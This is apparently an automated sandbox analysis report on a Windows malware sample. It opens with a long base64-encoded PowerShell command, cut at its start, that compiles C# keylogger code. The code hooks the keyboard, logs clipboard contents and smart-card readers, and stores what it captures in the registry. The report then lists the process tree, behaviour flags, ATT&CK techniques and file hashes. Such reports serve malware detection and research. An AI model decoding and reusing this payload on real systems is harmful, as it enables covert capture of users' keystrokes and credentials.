AbwBjAGUAcwBzAEIAeQBJAGQAKAAoAGkAbgB0ACkAXwBwAHIAbwBjAF8AaQBkAF8AKQA7AGkAZgAgACgAYQA3ADEAIAAhAD0AIABuAHUAbABsACkAIABrADYAOQAgAD0AIABhADcAMQAuAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AH0AfQBmADcAMAAuAEEAcABwAGUAbgBkACgAIgAgADoAOgAgAEMAbABpAHAAYgBvAGEAcgBkACIAKQA7AGkANgA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABpADYANgAuAEwAZQBuAGcAdABoACkAOwBpADYANgAuAEEAcABwAGUAbgBkACgAcAA2ADUAKQA7AGkANAAxACgAZgA3ADAALAAgAGsANgA5ACwAIABpADYANgApADsAZQAxADgAIAA9ACAAcAA2ADUAOwB9AH0AcwB0AHIAaQBuAGcAIABoADcAMgAgAD0AIAAiACIAOwBjADIAOAAgAGkANwAzADsAaQBmACAAKABkADIANwAgACEAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApAHsAdQBpAG4AdAAgAGMANwA0ACAAPQAgADEAMAAwADAAMAA7AGIAeQB0AGUAWwBdACAAaAA3ADUAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAYwA3ADQAXQA7AGkAZgAgACgAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAGQAMgA3ACwAIABuAHUAbABsACwAIABoADcANQAsACAAbwB1AHQAIABjADcANAApACAAPQA9ACAAMAApAHsATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABhADcANgAgAD0AIABjADYAMAAoAGgANwA1ACkAOwBpAG4AdAAgAGEANwA3ACAAPQAgAGEANwA2AC4AQwBvAHUAbgB0ADsAaQBmACAAKABhADcANwAgAD4AIAAwACkAewBpAG4AdAAgAGcANwA4ACAAPQAgADAAOwBjADIAOABbAF0AIABlADcAOQAgAD0AIABuAGUAdwAgAGMAMgA4AFsAYQA3ADcAXQA7AGYAbwByAGUAYQBjAGgAIAAoAHMAdAByAGkAbgBnACAAZwA4ADAAIABpAG4AIABhADcANgApAHsAZQA3ADkAWwBnADcAOABdAC4AbQAyADkAIAA9ACAAZwA4ADAAOwBnADcAOAArACsAOwB9AGkAZgAgACgAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgAZAAyADcALAAgADUAMAAwACwAIABlADcAOQAsACAAZQA3ADkALgBMAGUAbgBnAHQAaAApACAAPQA9ACAAMAApAHsAZgBvAHIAIAAoAGkAbgB0ACAAYQA4ADEAIAA9ACAAMAA7ACAAYQA4ADEAIAA8ACAAYQA3ADcAOwAgAGEAOAAxACsAKwApAHsAaQA3ADMAIAA9ACAAZQA3ADkAWwBhADgAMQBdADsAaAA3ADIAIAArAD0AIABpADcAMwAuAG0AMgA5ADsAaQBmACAAKAAoAGkANwAzAC4AbgAzADIAIAAmACAAMAB4ADAAMAAwADAAMAAwADIAMAApACAAIQA9ACAAMAApACAAaAA3ADIAIAArAD0AIAAiACAALQAgAGYAbwB1AG4AZAAiADsAaAA3ADIAIAArAD0AIAAiAFwAcgBcAG4AIgA7AH0AfQB9AH0AfQBSAGUAZwBpAHMAdAByAHkALgBTAGUAdABWAGEAbAB1AGUAKABmADIAMAAsACAAYQAyADIALAAgAGgANwAyACkAOwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQALgBTAGwAZQBlAHAAKAAxADAAMAAwACkAOwB9AHIAZQB0AHUAcgBuACAAMAA7AH0AWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAUwBlAHQAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAGkAbgB0ACAAawA4ADIALAAgAHAAMwAgAGkAOAAzACwAIABJAG4AdABQAHQAcgAgAG8AOAA0ACwAIAB1AGkAbgB0ACAAawA4ADUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVQBuAGgAbwBvAGsAVwBpAG4AZABvAHcAcwBIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAcAA4ADYAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAEkAbgB0AFAAdAByACAAcAA4ADYALAAgAGkAbgB0ACAAZAA0ADgALAAgAEkAbgB0AFAAdAByACAAbQA0ADkALAAgAEkAbgB0AFAAdAByACAAYQA1ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABNAG8AZAB1AGwAZQBIAGEAbgBkAGwAZQAoAHMAdAByAGkAbgBnACAAYQA4ADcAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAATQBhAHAAVgBpAHIAdAB1AGEAbABLAGUAeQAoAGkAbgB0ACAAaAA4ADgALAAgAHUAaQBuAHQAIABkADgAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABLAGUAeQBiAG8AYQByAGQATABhAHkAbwB1AHQAKAB1AGkAbgB0ACAAbgA5ADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVABvAFUAbgBpAGMAbwBkAGUARQB4ACgAaQBuAHQAIABiADkAMQAsACAAdQBpAG4AdAAgAGsAOQAyACwAIABiAHkAdABlAFsAXQAgAGEAOQAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAbwA5ADQALAAgAGkAbgB0ACAAYQA5ADUALAAgAHUAaQBuAHQAIABqADkANgAsACAAdQBpAG4AdAAgAG8AOQA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABTAHQAYQB0AGUAKABiAHkAdABlAFsAXQAgAGYAOQA4ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGgAcgBlAGEAZABQAHIAbwBjAGUAcwBzAEkAZAAoAHUAaQBuAHQAIABiADkAOQAsACAAcgBlAGYAIAB1AGkAbgB0ACAAawAxADAAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAHUAaQBuAHQAIABvADEAMAAxACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQAKAB1AGkAbgB0ACAAbwAxADAAMQAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGMAMQAwADIALAAgAGkAbgB0ACAAYgAxADAAMwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAG0AMQAwADQALAAgAHUAaQBuAHQAIABpADEAMAA1ACwAIABqADYAIABsADEAMAA2ACwAIABJAG4AdABQAHQAcgAgAG4AMQAwADcALAAgAHUAaQBuAHQAIABvADEAMAA4ACwAIABJAG4AdABQAHQAcgAgAGoAMQAwADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAEUAeABpAHQAUAByAG8AYwBlAHMAcwAoAHUAaQBuAHQAIABsADEAMQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABDAHIAZQBhAHQAZQBNAHUAdABlAHgAKABJAG4AdABQAHQAcgAgAGUAMQAxADEALAAgAGIAbwBvAGwAIABiADEAMQAyACwAIABzAHQAcgBpAG4AZwAgAGsAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE8AcABlAG4ATQB1AHQAZQB4ACgAdQBpAG4AdAAgAGkAMQAxADQALAAgAGIAbwBvAGwAIABmADEAMQA1ACwAIABzAHQAcgBpAG4AZwAgAGsAMQAxADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoAEkAbgB0ADMAMgAgAGgAMQAxADYALAAgAEkAbgB0AFAAdAByACAAaAAxADEANwAsACAASQBuAHQAUAB0AHIAIABnADEAMQA4ACwAIABvAHUAdAAgAEkAbgB0AFAAdAByACAAagAxADEAOQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAQQAiACwAIABDAGgAYQByAFMAZQB0ACAAPQAgAEMAaABhAHIAUwBlAHQALgBBAG4AcwBpACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwAoAEkAbgB0AFAAdAByACAAagAxADEAOQAsACAAYgB5AHQAZQBbAF0AIABjADEAMgAwACwAIABiAHkAdABlAFsAXQAgAGwAMQAyADEALAAgAG8AdQB0ACAAVQBJAG4AdAAzADIAIABiADEAMgAyACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEcAZQB0AFMAdABhAHQAdQBzAEMAaABhAG4AZwBlACgASQBuAHQAUAB0AHIAIABqADEAMQA5ACwAIABVAEkAbgB0ADMAMgAgAGQAMQAyADMALAAgAFsASQBuACwAIABPAHUAdABdACAAYwAyADgAWwBdACAAZQA3ADkALAAgAEkAbgB0ADMAMgAgAHAAMQAyADQAKQA7AH0AfQANAAoAIgBAACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwBbAGoAMQAuAGYAMgBdADoAOgBSAHUAbgAoACAAewAgACQAbgB1AGwAbAAgAD0AIABbAGMAbwBuAHMAbwBsAGUAXQA6ADoAQwBhAHAAcwBMAG8AYwBrACAAfQAgACkA
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vzwpohkz.cmdline"
2⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49BF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC49AE.tmp"
3⤵
PID:360

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\8e28fefd0.js

Filesize
49KB

MD5
31657f7c605b5b8d16c85938d2bd2c46

SHA1
12eb4cb914b448cca27a178ec6d21795f66a387d

SHA256
55b7c7fce754ff5922f63d0c85d60851a2922b37e1ddd8dd0501063ed5e90f3e

SHA512
03731875fc869d4eff318ce61fea34f17c5dcd4e8a361aeccb6f6aa88d2d9eba0dbc32c14f32759c18218600a64787ab0b1131564b6215a4f1457360151d6800

Download Submit
C:\Users\Admin\AppData\Local\Temp\279155113.js

Filesize
49KB

MD5
31657f7c605b5b8d16c85938d2bd2c46

SHA1
12eb4cb914b448cca27a178ec6d21795f66a387d

SHA256
55b7c7fce754ff5922f63d0c85d60851a2922b37e1ddd8dd0501063ed5e90f3e

SHA512
03731875fc869d4eff318ce61fea34f17c5dcd4e8a361aeccb6f6aa88d2d9eba0dbc32c14f32759c18218600a64787ab0b1131564b6215a4f1457360151d6800

Download Submit
C:\Users\Admin\AppData\Local\Temp\3006510736

Filesize
40KB

MD5
b7409b6611bd7c096347fe940737f5cf

SHA1
401061ed14da11abed06c605f1f8bc5e05089291

SHA256
ebfd7c0ccbe30aa48586e9235d5e414ecff28a5463f80ddc8dfc2dd5f15aee09

SHA512
d2d0fbbcec386dfe1f1d168fc38a942df2ce350d4620e6c629c198ed26bd454353b93700a12dfcddfb714befa716d5466efd71049e63aaa8170d9f9b8d72f7e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES49BF.tmp

Filesize
1KB

MD5
8c3ca72db45af5224869a2c334da05fa

SHA1
0a8187825cb953b48d8af019368437f6c0bc5ee4

SHA256
ca7839aeae0d6cbf4aa26e3cbe90cf0074b1ee0e1cb04ff0e296f8a423726dda

SHA512
f2f4930e2eb0a2d6ca8052a865f0acce36c2a5994d8455ea9cc79590ed01775b6eff09202e74aa53600b58a7bf59098c7301bdcf683acfe683917a3911d45699

Download Submit
C:\Users\Admin\AppData\Local\Temp\vzwpohkz.dll

Filesize
10KB

MD5
592f8283307ced8a0fe94e93c1999f63

SHA1
efa38fc05a22280129c70088ab06abda78ad1c1b

SHA256
8b745c605eb44ef4609c340c0e4e146f2dc3bdb0d14a1cb3fe46b5509b555257

SHA512
724c50335d0f3e6facfb10f907f9cabac85b2241b7d198ff36e75ee29672bd951ae414697a5e7f37fc24461a9184ba322cb1c3a35a7c57538c78afe3702f6c60

Download Submit
C:\Users\Admin\AppData\Local\Temp\vzwpohkz.pdb

Filesize
17KB

MD5
1dce454cb01645aa9ba8d652d117e56c

SHA1
65d198232748ac8dfe4f5f81375c9853fdb77cdd

SHA256
78902378b2e1afd795391f410aae8fd33a756b1d1fdee3c953d359224f683190

SHA512
4d41cf1420f8211beeb048d218af8e5e1abb8f265377ff4d8e82f49c9f419d1dd35470fecd99e3683701a3daec39820099b60d49e41026fa650b9584542b656c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC49AE.tmp

Filesize
652B

MD5
0ac8ab2bdb0fd879a94003690f536f46

SHA1
a83a32dc08538a7a81183296429d475268dd379d

SHA256
65834b053b29c5f00d743619de38151fd92c34ce412057d215d65cfaf7f89e6d

SHA512
8cab70d1a3045b618205264b42046b96e92f4da2bed1cc888ca7bea615a5bc655f4157b0c324bf9e66a0673ee01063108f7b52ddaa53168f21b5a6067fdbe772

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vzwpohkz.0.cs

Filesize
7KB

MD5
1addc514404476f89b8b8ad97351c9af

SHA1
c3a9c10eb6dbaf1eb15243105016fc38379134eb

SHA256
5ff19533353f02f42ca891f03846e4d5f0f56f749aa5923912d38f495b57ae89

SHA512
439f90d9a94eced396d6ff17c3dc7269669b97809abe93cf39e7467092a8522be5299679d253680aabefcd9ff005e031425a674a0ea8a1a0e35e47e049c3c398

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vzwpohkz.cmdline

Filesize
415B

MD5
ef810aa4155d9aa18b5fcdb4da95fca1

SHA1
679dc5908e411af5de0ad66eefd4d2a288b74f86

SHA256
725a5e2600c8b61b4767a8dd1f1c7b6bdd6ad60579e8787bad14b75a1cdd7d58

SHA512
bad61575161b213cd7e85c0c290de1d3f4d9254aa77dd390a80dad4dfa9bf1540d65ebbf702f6e81d3d24351407d436ead729153ccf309d8cf6fcdd26e111832

Download Submit
memory/360-71-0x0000000000000000-mapping.dmp

Download
memory/948-55-0x0000000000000000-mapping.dmp

Download
memory/1068-59-0x0000000000000000-mapping.dmp

Download
memory/1260-54-0x0000000075091000-0x0000000075093000-memory.dmp

Filesize
8KB

Download
memory/1888-67-0x0000000000000000-mapping.dmp

Download
memory/1900-64-0x000000001B920000-0x000000001BC1F000-memory.dmp

Filesize
3.0MB

Download
memory/1900-70-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/1900-66-0x000007FEEDD20000-0x000007FEEEDB6000-memory.dmp

Filesize
16.6MB

Download
memory/1900-65-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1900-63-0x000007FEF3640000-0x000007FEF419D000-memory.dmp

Filesize
11.4MB

Download
memory/1900-62-0x000007FEF41A0000-0x000007FEF4BC3000-memory.dmp

Filesize
10.1MB

Download
memory/1900-61-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

Filesize
8KB

Download
memory/1900-76-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1900-77-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download